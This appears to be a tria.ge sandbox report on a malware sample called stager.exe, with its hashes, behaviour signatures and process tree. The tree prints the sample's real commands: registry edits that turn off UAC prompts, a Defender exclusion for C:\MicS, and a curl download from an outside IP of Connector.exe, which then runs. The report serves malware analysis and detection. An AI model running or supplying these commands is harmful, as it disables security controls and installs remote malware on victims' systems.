Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    152s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/07/2023, 13:01

General

  • Target

    stager.exe

  • Size

    1.9MB

  • MD5

    4ed2a8948a165b72025d5868a31a34c8

  • SHA1

    b25b9db66eefe9418bb398a8a5ffe4aebb7d4ff8

  • SHA256

    79d1a9ec049f598528e505aa71fdd68f01f7abcd8cb29c1e54ba018d239ae282

  • SHA512

    64411bb2f3510f26114d809409dd9af29238fb1c43ee005c08c3b00826be0bce0230ad26afc786961b659d8cc470f59ed12108b4a11056b702a516330bbec380

  • SSDEEP

    24576:GXjaqCL0DG3EZJOHVXGGUIHjNGxmKg7xf:GXjaADG3EWVd

Score
10/10

Malware Config

Signatures

  • UAC bypass 3 TTPs 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\stager.exe
    "C:\Users\Admin\AppData\Local\Temp\stager.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4780
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1148
      • C:\Windows\system32\reg.exe
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        PID:3020
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1088
      • C:\Windows\system32\reg.exe
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        PID:556
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c mkdir "C:\MicS"
      2⤵
        PID:3572
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\MicS"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3900
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath "C:\MicS"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1268
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl -o "C:\MicS\Connector.exe" "http://13.50.250.113/Connector.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:988
        • C:\Windows\system32\curl.exe
          curl -o "C:\MicS\Connector.exe" "http://13.50.250.113/Connector.exe"
          3⤵
            PID:4796
        • C:\MicS\Connector.exe
          "C:\MicS\Connector.exe"
          2⤵
          • Executes dropped EXE
          PID:4636

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\MicS\Connector.exe

        Filesize

        1.9MB

        MD5

        d4f8be5303fc3c96545a4d259fe884c1

        SHA1

        251a4e6299c6b2f577ad25d6de765cca0e097750

        SHA256

        21c79c8aba3fd51e5c73f4d0b080763c8e3eef8f450df99c3686d3d0e21e18c0

        SHA512

        9a7212936cdec950db0ffb58767109df0142317378437a4c7d96b9b4a7c9d6613ae573e1689a986233fa4a5d86e51b00443c2afe57ef0f91fa0e59753f200658

      • C:\MicS\Connector.exe

        Filesize

        1.9MB

        MD5

        d4f8be5303fc3c96545a4d259fe884c1

        SHA1

        251a4e6299c6b2f577ad25d6de765cca0e097750

        SHA256

        21c79c8aba3fd51e5c73f4d0b080763c8e3eef8f450df99c3686d3d0e21e18c0

        SHA512

        9a7212936cdec950db0ffb58767109df0142317378437a4c7d96b9b4a7c9d6613ae573e1689a986233fa4a5d86e51b00443c2afe57ef0f91fa0e59753f200658

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_joaz121d.s0x.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Connector.lnk

        Filesize

        659B

        MD5

        02e8749bd66771e8721ca6562582b593

        SHA1

        cfedc0fc7bc4f0922fdacba822d36a0d556702ea

        SHA256

        5331a73d6b6a63561924907c1887ee349409698e30e068450dbde47803d08f67

        SHA512

        acd391d49db843e8fb204fd657ed6b11617d44b379f1cef1f43dc48ebe6ae4ea7109c2716e485420aa55955578dbd6edd35a8a0cb84b44660afa0f374f893a73

      • memory/1268-138-0x0000015A54BD0000-0x0000015A54BE0000-memory.dmp

        Filesize

        64KB

      • memory/1268-146-0x0000015A56DC0000-0x0000015A56DE2000-memory.dmp

        Filesize

        136KB

      • memory/1268-147-0x0000015A54BD0000-0x0000015A54BE0000-memory.dmp

        Filesize

        64KB

      • memory/1268-150-0x00007FFC5CFE0000-0x00007FFC5DAA1000-memory.dmp

        Filesize

        10.8MB

      • memory/1268-137-0x0000015A54BD0000-0x0000015A54BE0000-memory.dmp

        Filesize

        64KB

      • memory/1268-136-0x00007FFC5CFE0000-0x00007FFC5DAA1000-memory.dmp

        Filesize

        10.8MB

      • memory/4636-171-0x00007FF6C8DF0000-0x00007FF6C908B000-memory.dmp

        Filesize

        2.6MB

      • memory/4636-172-0x00007FF6C8DF0000-0x00007FF6C908B000-memory.dmp

        Filesize

        2.6MB

      • memory/4780-133-0x00007FF635620000-0x00007FF6358B1000-memory.dmp

        Filesize

        2.6MB

      • memory/4780-170-0x00007FF635620000-0x00007FF6358B1000-memory.dmp

        Filesize

        2.6MB